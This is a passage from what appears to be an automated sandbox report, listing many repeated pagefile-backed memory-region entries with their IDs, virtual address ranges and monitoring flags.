= 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4277 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4278 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4279 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4280 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4281 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4282 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4283 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4284 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4285 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4286 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4287 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4288 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4289 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4290 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4291 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4292 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4293 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4294 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4295 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4296 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4297 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4298 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4299 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4300 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4301 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4302 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4303 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4304 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4305 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4306 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4307 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4308 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4309 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4310 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4311 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4312 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4313 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4314 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4315 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4316 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4317 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4318 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4319 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4320 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4321 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4322 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4323 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4324 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4325 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4326 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4327 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4328 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4329 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4330 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4331 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4332 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4333 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4334 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4335 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4336 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4337 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4338 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4339 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4340 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4341 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4342 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4343 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4344 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4345 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4346 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4347 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4348 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4349 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4350 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4351 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4352 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4353 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4354 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4355 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4356 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4357 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4358 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4359 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4360 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4361 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4362 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4363 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4364 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4365 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4366 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4367 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4368 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4369 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4370 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4371 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4372 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4373 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4374 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4375 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4376 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4377 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4378 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4379 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4380 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4381 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4382 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4383 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4384 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4385 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4386 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4387 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4388 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4389 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4390 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4391 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4392 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4393 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4394 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4395 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4396 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4397 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4398 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4399 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4400 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4401 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4402 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4403 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4404 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4405 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4406 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4407 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4408 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4409 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4410 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4411 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4412 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4413 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4414 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4415 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4416 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4417 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4418 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4419 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4420 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4421 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4422 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4423 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4424 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4425 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4426 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4427 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4428 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4429 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4430 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4431 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4432 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4433 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4434 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4435 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4436 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4437 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4438 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4439 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4440 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4441 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4442 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4443 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4444 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4445 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4446 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4447 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4448 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4449 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4450 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4451 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4452 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4453 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4454 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 